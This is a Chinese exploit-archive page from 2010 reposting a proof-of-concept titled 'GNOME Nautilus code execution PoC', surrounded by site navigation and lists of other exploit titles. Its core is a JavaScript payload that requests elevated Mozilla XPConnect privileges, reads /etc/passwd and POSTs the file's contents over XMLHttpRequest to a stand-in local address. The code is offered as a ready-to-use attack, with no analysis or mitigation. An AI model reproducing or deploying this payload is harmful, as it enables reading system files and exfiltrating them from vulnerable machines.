首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GNOME Nautilus code execution PoC
来源:vfocus.net 作者:vfocus 发布时间:2010-02-09  
<script>
 netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
 var f = Components.classes["@mozilla.org/file/local;1"]
 .createInstance(Components.interfaces.nsILocalFile);
 f.initWithPath("/etc/passwd");
 var is = Components.classes["@mozilla.org/network/file-input-stream;1"]
 .createInstance(Components.interfaces.nsIFileInputStream);
 is.init(f,0x01,00004,null);
 var sis = Components.classes["@mozilla.org/scriptableinputstream;1"]
 .createInstance(Components.interfaces.nsIScriptableInputStream);
 sis.init(is); var req = new XMLHttpRequest();
 req.open("POST", "http://127.0.0.1:69/", true);
 req.overrideMimeType("text/xml");
 req.setRequestHeader("Credits", "fRoGGz, SecuBox Labs");
 req.sendAsBinary(sis.read(sis.available()));
</script>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ipswitch IMail Server - IMAP4
·M.J.M. Quick Player v1.2 Unico
·Linux bin/cat /etc/passwd 43 b
·Solaris/Open Solaris UCODE_GET
·LDAP Injection POC
·Safari v4.0.4, Firefox v3.5.6,
·PLS PLA‏ WMDownloader (P
·httpdx v1.5.2 Remote Pre-Authe
·Vermillion FTP Daemon PORT Com
·X-lite SIP v3 (wav) memory cor
·This is a proof of concept exp
·FoxPlayer 1.7.0 (.m3u) Local B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved